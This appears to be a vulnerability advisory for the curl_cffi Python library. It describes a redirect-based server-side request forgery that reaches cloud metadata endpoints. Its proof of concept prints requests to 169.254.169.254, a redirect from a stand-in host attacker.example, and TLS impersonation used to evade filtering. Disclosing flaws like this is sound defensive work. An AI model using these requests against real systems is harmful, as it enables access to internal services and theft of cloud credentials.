Server-side request forgery (SSRF) In curl-cffi
Description
curl_cffi: Redirect-based SSRF leads to internal network access in curl_cffi (with TLS impersonation bypass)
Summary
curl_cffi does not restrict requests to internal IP ranges, and follows redirects automatically via the underlying libcurl.
Because of this, an attacker-controlled URL can redirect requests to internal services such as cloud metadata endpoints. In addition, curl_cffi’s TLS impersonation feature can make these requests appear as legitimate browser traffic, which may bypass certain network controls.
Details
The issue comes from how curl_cffi handles outbound requests
User-supplied URLs are passed directly to libcurl without checking whether they resolve to internal IP ranges (e.g., 127.0.0.1, 169.254.0.0/16).
Redirects are automatically followed (CURLOPT_FOLLOWLOCATION = 1) inside libcurl.
There is no validation of redirect destinations at the Python layer.
This means that even if an application only allows requests to external URLs, an attacker can
Provide a URL pointing to an attacker-controlled server
Return a redirect response pointing to an internal service
Have curl_cffi follow that redirect automatically
As a result, internal endpoints (such as cloud instance metadata APIs) can be accessed.
Additionally, curl_cffi supports TLS fingerprint impersonation (e.g., impersonate="chrome"). In environments where outbound requests are filtered based on TLS fingerprinting, this can make such requests harder to detect or block
This behavior is similar to previously reported redirect-based SSRF issues such as CVE-2025-68616, where redirects allowed access to unintended internal resources.
PoC
Direct internal request
import curl_cffi resp = curl_cffi.get("http://169.254.169.254/latest/meta-data/") print(resp.text)
Redirect to internal service Attacker server:
GET /test → 302 Location: http://169.254.169.254/latest/meta-data/
Victim code:
import curl_cffi resp = curl_cffi.get("https://attacker.example/test") print(resp.text)
Result
Initial request goes to attacker server
Redirect is returned
libcurl follows the redirect automatically
Internal metadata endpoint is accessed
With TLS impersonation
import curl_cffi\ resp = curl_cffi.get( "https://attacker.example/test", impersonate="chrome")
In some environments, this may help the request bypass TLS-based filtering controls.
Impact
An attacker who can control the requested URL may be able to:
Access internal network services
Reach cloud metadata endpoints and retrieve sensitive information
Bypass certain outbound filtering mechanisms (depending on environment) This corresponds to CWE-918 Server-Side Request Forgery.
Mitigation
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
Aliases
References